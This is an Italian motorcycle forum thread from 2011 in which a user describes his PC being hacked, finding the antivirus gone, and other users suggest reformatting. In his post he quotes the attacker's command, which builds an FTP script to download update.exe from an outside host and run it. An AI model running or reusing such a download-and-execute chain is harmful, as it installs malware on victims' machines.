FORUM YAMAHA XT TT 600 ITALIA - www.xt600.eu

UN PO' "OT" => PC, MELE & PINGUINI => Discussione aperta da: Zendar il 26 Gennaio 2011, 22:54:14

Titolo: sono stato penetrato...
Inserito da: Zendar il 26 Gennaio 2011, 22:54:14
..in senso hacker!
sul pc che uso come muletto per emule..una volta mi sono trovato una bella finestra dos con un messaggino "you got owned"  (traducibile con -> bananixxx ) stavolta notavo che mi era sparito l'antivirus (comodo, il pacchetto comprensivo di firewall) e mi sono trovato tra i comandi digitati da "esegui" :

cmd /c echo open upgrade2.myftp.org  21 >> ik &echo user temp temp >> ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &update.exe &exit

da quanto capisco..hanno aperto un sito ftp dal mio pc e scaricato sto file "update.exe" ma poi che hanno fatto?
guardando il registro di windows ho notato 2 accessi da ip diversi e mi sembra di capire che siano entrati tramite realvnc (che è installato sul pc) indirizzi uno di vicino Brasilia e l'altro dalla Russia.
Intanto mi faccio una bella scansione approfondita...poi boh..reimposto il firewall ad un livello più alto e vediamo se si ri-intrufola qualcuno..
Titolo: Re: sono stato penetrato...
Inserito da: FabioC il 27 Gennaio 2011, 08:36:17
Io arerei il disco e reinstallerei da 0... :)
Titolo: Re: sono stato penetrato...
Inserito da: Zendar il 27 Gennaio 2011, 12:56:41
ah sei per le soluzioni drastiche :D
intanto..di sicuro rimuovo la suite di comodo, oltre a essere penetrabile il firewall (tante recensioni positive mah) anche l'antivirus non ha trovato un cavolo..al contrario di malwarebyte che mi ha trovato un bel trojan backdoor, ora proverò Online Armor come firewall..vediamo com'è :)
Titolo: Re: sono stato penetrato...
Inserito da: f.rospo il 27 Gennaio 2011, 22:24:02
format:C